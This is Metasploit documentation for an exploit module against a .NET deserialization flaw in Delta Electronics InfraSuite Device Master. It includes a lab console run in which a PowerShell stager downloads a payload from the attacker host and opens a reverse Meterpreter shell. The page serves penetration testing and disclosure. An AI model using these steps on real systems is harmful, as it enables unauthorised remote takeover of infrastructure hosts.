metasploit-gs/documentation/modules/exploit/windows/misc/delta_electronics_infrasuite_deserialization.md

Vulnerable Application

Delta Electronics InfraSuite Device Master versions below v1.0.5 are vulnerable to an unauthenticated .NET deserialization vulnerability in the Device-Gateway-Status process which listens on port 10100 and communicates over UDP. Its ParseUDPPacket() method reads user-controlled data and passes what it determines to be the packet header to the BinaryFormatter.Deserialize() method without appropriate validation, resulting in code execution as the user running the Device-Gateway-Status process.

Installation Instructions

1. Unzip and run the installer from https://archive.org/details/infra-suite-device-master-00.00.01ax-64
2. Install all of the pre-requisites (Stack Builder is not needed) and reboot
3. Click next and ensure the three features, Device-Monitor, Device-DataCollect, and Device-Gateway are selected to install
4. The password on the next screen should say Ems3000!, but it is not needed for the exploit
5. Click Next, then Install
6. Click Finish, then wait for the processing of files to finish
7. Once the previous step is done, ensure Yes, I want to restart my computer now is checked and click Finish

Verification Steps

1. Install the application
2. Start msfconsole
3. Do: use exploit/windows/misc/delta_electronics_infrasuite_deserialization
4. Do: set RHOST <IP>
5. Do: set INFRASUITE_PORT <PORT_NO>
6. Do: run
7. You should get a meterpreter session.

Options

INFRASUITE_PORT

This is the option on which the web-based InfraSuite Device Manager listens. It is only used to check the version of the software to determine exploitability. 80 by default

Scenarios

InfraSuite Device Master v01.00.00d on Windows 10 x64

msf6 > use exploit/windows/misc/delta_electronics_infrasuite_deserialization
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/misc/delta_electronics_infrasuite_deserialization) > set rhost 192.168.140.187
rhost => 192.168.140.187
msf6 exploit(windows/misc/delta_electronics_infrasuite_deserialization) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(windows/misc/delta_electronics_infrasuite_deserialization) > options

Module options (exploit/windows/misc/delta_electronics_infrasuite_deserialization):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   INFRASUITE_PORT  80               yes       The port on which the InfraSuite Manager is listening
   Proxies                           no        A proxy chain of format type:host:port[,type:host:port]
                                               [...]
   RHOSTS           192.168.140.187  yes       The target host(s), see https://docs.metasploit.com/doc
                                               s/using-metasploit/basics/using-metasploit.html
   RPORT            10100            yes       The target port (UDP)
   SSL              false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                           no        Path to a custom SSL certificate (default is randomly g
                                               enerated)
   TARGETURI        /                yes       The base path to the InfraSuite Manager
   URIPATH                           no        The URI to use for this exploit (default is random)
   VHOST                             no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be
                                       an address on the local machine or 0.0.0.0 to listen on all add
                                       resses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.140.1    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows EXE Dropper



View the full module info with the info, or info -d command.


msf6 exploit(windows/misc/delta_electronics_infrasuite_deserialization) > run

[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Requesting the login page to determine if target is Infrasuite Device Master...
[*] Target is InfraSuite Device Master. Now attempting to determine version.
[+] The target appears to be vulnerable.
[*] Using URL: http://192.168.140.1:8080/xkRhewOXntAgYs
[*] Command Stager progress - 100.00% done (153/153 bytes)
[*] Client 192.168.140.187 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.2673) requested /xkRhewOXntAgYs
[*] Sending payload to 192.168.140.187 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.2673)
[*] Sending stage (175686 bytes) to 192.168.140.187
[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.187:50409) at 2023-06-05 17:09:29 -0500
[*] Server stopped.

meterpreter > getuid
Server username: DESKTOP-R6RCNHH\space
meterpreter > sysinfo
Computer        : DESKTOP-R6RCNHH
OS              : Windows 10 (10.0 Build 19045).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 5
Meterpreter     : x86/windows
meterpreter >